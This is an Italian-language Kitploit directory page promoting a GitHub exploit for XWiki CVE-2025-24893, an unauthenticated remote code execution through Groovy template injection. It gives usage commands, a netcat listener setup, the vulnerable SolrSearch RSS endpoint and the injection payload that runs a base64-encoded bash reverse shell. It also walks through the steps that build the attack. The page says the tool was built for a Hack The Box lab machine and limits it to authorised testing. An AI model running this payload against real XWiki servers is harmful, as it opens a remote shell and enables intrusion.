Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xwiki-cve-2025-24893-exploit — Exploit RCE non autenticato per XWiki CVE-2025-24893 tramite iniezione di script Groovy | Kitploit
Strumenti/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Exploit RCE non autenticato per XWiki CVE-2025-24893 tramite iniezione di script Groovy

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
7 mesi faNon ancora revisionato

Exploit per XWiki CVE-2025-24893

Exploit di Esecuzione Remota di Codice non autenticato per le versioni di XWiki vulnerabili a CVE-2025-24893.

Panoramica della Vulnerabilità

Le versioni di XWiki precedenti alla 15.10.9 sono vulnerabili a RCE non autenticata tramite l'iniezione di script Groovy nel gestore dei feed RSS di SolrSearch. La vulnerabilità esiste perché XWiki non riesce a sanitizzare correttamente l'input dell'utente nel parametro text, consentendo agli attaccanti di uscire dal contesto RSS e iniettare codice Groovy arbitrario.

ID CVE: CVE-2025-24893
Punteggio CVSS: 9.8 (Critico)
Versioni interessate: XWiki < 15.10.9

Caratteristiche

  • Interfaccia a riga di comando semplice
  • Generazione e codifica automatica del payload
  • Reverse shell codificata in Base64 per bypassare i filtri di base
  • Dipendenze minime (solo libreria requests)

Requisiti

root@kitploit:~
pip3 install requests

Utilizzo

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

Esempio:

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 9001

# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Come Funziona

  1. Costruisce un comando di reverse shell bash
  2. Codifica il payload in Base64
  3. Lo avvolge in codice Groovy usando l'iniezione di template (}}}}}}{{{{groovy}}}})
  4. Codifica l'URL del payload preservando i delimitatori necessari
  5. Invia una richiesta GET a /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. XWiki elabora il feed RSS dannoso ed esegue il codice Groovy

Prova di Concetto

L'exploit ha come bersaglio il seguente endpoint:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

La vulnerabilità consente di uscire dal contesto del feed RSS:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.

Riferimenti

  • Avviso di sicurezza XWiki
  • CVE-2025-24893

Licenza

Licenza MIT - Consulta il file LICENSE per i dettagli

Autore

Creato per la macchina HTB "Editor"


Nota: Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.

Scarica lo strumento